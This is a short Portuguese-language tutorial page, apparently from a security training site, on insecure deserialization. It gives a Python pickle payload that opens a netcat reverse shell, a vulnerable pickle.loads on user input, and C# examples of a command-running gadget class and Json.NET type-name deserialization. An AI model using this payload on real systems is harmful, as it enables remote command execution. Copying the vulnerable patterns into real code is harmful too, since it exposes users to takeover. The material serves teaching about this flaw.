Skip to main content

Insecure Deserialization | Solyd One

  • Insecure Deserialization | Solyd One

  • No código abaixo, estamos realizar um shell reverse por meio da serialização e deserialização

Python

Serialização

import pickle
import base64
import os

class Evil:
def __reduce__(self):
return (os.system, ("nc 127.0.0.1 7788 -e /bin/bash",))

print(base64.b64encode(pickle.dumps(Evil())))

Deserialização

import pickle
import base64

data = input(">>")
deserialized = pickle.loads(base64.b64decode(data))
print(deserialized)

C#

public class CommandManager {
public string? output { get; set; }

private string? _command;

public string? command {
get { return _command; }

set {
_command = value;

Process p = new Process();
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.FileName = "/usr/bin/env";
p.StartInfo.Arguments = _command;
p.Start();

output = p.StandardOutput.ReadToEnd();
p.WaitForExit();

Console.WriteLine(output);
}
}
};

/**/


var result = JsonConvert.DeserializeObject<object>(
user_input,
new JsonSerializerSettings { TypeNameHandling = TypeNameHandling.Objects }
);

Nodejs